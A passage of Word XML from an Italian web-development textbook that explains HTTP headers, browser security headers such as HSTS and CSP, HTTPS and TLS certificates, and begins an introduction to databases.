    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Header che il browser invia al server:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il nome del dominio richiesto (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: www.esempio.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Obbligatorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: identifica il browser e il sistema operativo. Esempio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ... Chrome/120.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Serve a server e statistiche per sapere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che tipo di client sta accedendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Accept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: che tipi di contenuto il client è in grado di ricevere (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ecc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: che lingue il client preferisce. Usato dai siti per servire automaticamente la versione localizzata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: i cookie precedentemente impostati, rinviati al server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Referer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la pagina da cui arriva il click corrente (con una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sola: storico errore di battitura mai corretto nella specifica HTTP). Importante per la sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: usato per inviare credenziali (token, basic auth). Vedremo casi nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Header che il server invia al client:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il tipo di contenuto della risposta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ecc.). Il browser decide cosa fare in base a questo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dimensione in byte del corpo della risposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: imposta uno o più cookie sul browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: usato nelle risposte 3xx per dire al browser dove redirigersi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cache-Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: regole di caching (per quanto tempo il browser può tenere in memoria locale questa risposta).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Header di sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(li tratteremo a tempo debito):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strict-Transport-Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(HSTS): forza il browser a usare HTTPS per tutte le richieste future verso questo dominio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CSP): regola severamente quali script possono essere eseguiti nella pagina. Difesa principale contro XSS (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: impedisce alla pagina di essere caricata dentro un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un altro sito (difesa contro il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">clickjacking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: impedisce al browser di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indovinare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il tipo di un file ignorando il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memorizzane il nome adesso: torneranno nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="123" w:name="https-http-cifrato"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="sec_3_8"/>
      <w:r>
        <w:t xml:space="preserve">3.8 HTTPS: HTTP cifrato</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trasmette tutto in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiaro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chi sta in mezzo alla comunicazione (chiunque controlli un nodo della rete: il provider, l’amministratore della rete Wi-Fi del bar, un attaccante che ha intercettato la rete) può leggere ogni richiesta e ogni risposta. Username, password, contenuti di pagine private, cookie di sessione: tutto trasportato come testo leggibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) risolve questo problema aggiungendo uno strato di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Transport Layer Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Tecnicamente: HTTPS = HTTP + TLS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa cambia quando un sito usa HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il traffico tra browser e server è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifrato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chi intercetta vede solo dati casuali, illeggibili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">identità del server è certificata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da un’autorità di certificazione: il browser controlla che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sia davvero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e non un sito truffa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">integrità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del traffico è garantita: nessuno può modificare i dati in transito senza che browser e server se ne accorgano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Certificato TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= un documento elettronico firmato da un’autorità di certificazione (es. Let’s Encrypt, DigiCert) che attesta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">il sito www.esempio.it è davvero gestito da chi dice di esserlo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando vedi il lucchetto chiuso nella barra del browser, significa che il certificato è valido e la connessione è cifrata. Quando il browser mostra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Connessione non protetta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">significa che il certificato manca, è scaduto o non corrisponde al sito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dal 2018 circa,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tutti i siti seri devono usare HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Google penalizza nei risultati di ricerca i siti che non lo fanno; i browser mostrano avvisi minacciosi. Per uno sviluppatore moderno, scrivere applicazioni HTTPS-only è la norma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In sviluppo locale, però, useremo HTTP semplice.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando avvii Flask sul tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:5000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il sito è HTTP, non HTTPS. È accettabile perché il traffico non lascia mai la tua macchina. In produzione, il server web (di solito un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">reverse proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come Nginx o Apache davanti a Flask) si occupa di terminare la connessione TLS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="127" w:name="i-database-cosa-sono-e-perché-esistono"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="sec_3_9"/>
      <w:r>
        <w:t xml:space="preserve">3.9 I database: cosa sono e perché esistono</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione web seria non può tenere i dati in variabili Python: appena il programma si ferma, i dati svaniscono. Servono dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: programmi specializzati nel salvare grandi quantità di dati su disco in modo organizzato, efficiente, affidabile e accessibile da molti utenti contemporaneamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="124" w:name="lanalogia-del-grande-schedario"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’analogia del grande schedario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pensa a uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">studio medico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con migliaia di pazienti. Ogni paziente ha una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cartella clinica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un raccoglitore con il nome, i dati anagrafici, lo storico delle visite, le ricette. Tutte le cartelle sono organizzate in un grande schedario, ordinate per cognome.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un medico vuole sapere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">qual è la diagnosi del paziente Mario Rossi del 12 marzo?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non legge tutte le cartelle: va all’indice, cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rossi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, apre la cartella, sfoglia fino al 12 marzo. Veloce e sistematico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è esattamente questo schedario, in versione digitale e gigantesca. Le cartelle si chiamano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tabelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le pagine di una cartella si chiamano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">righe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le voci di una pagina si chiamano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
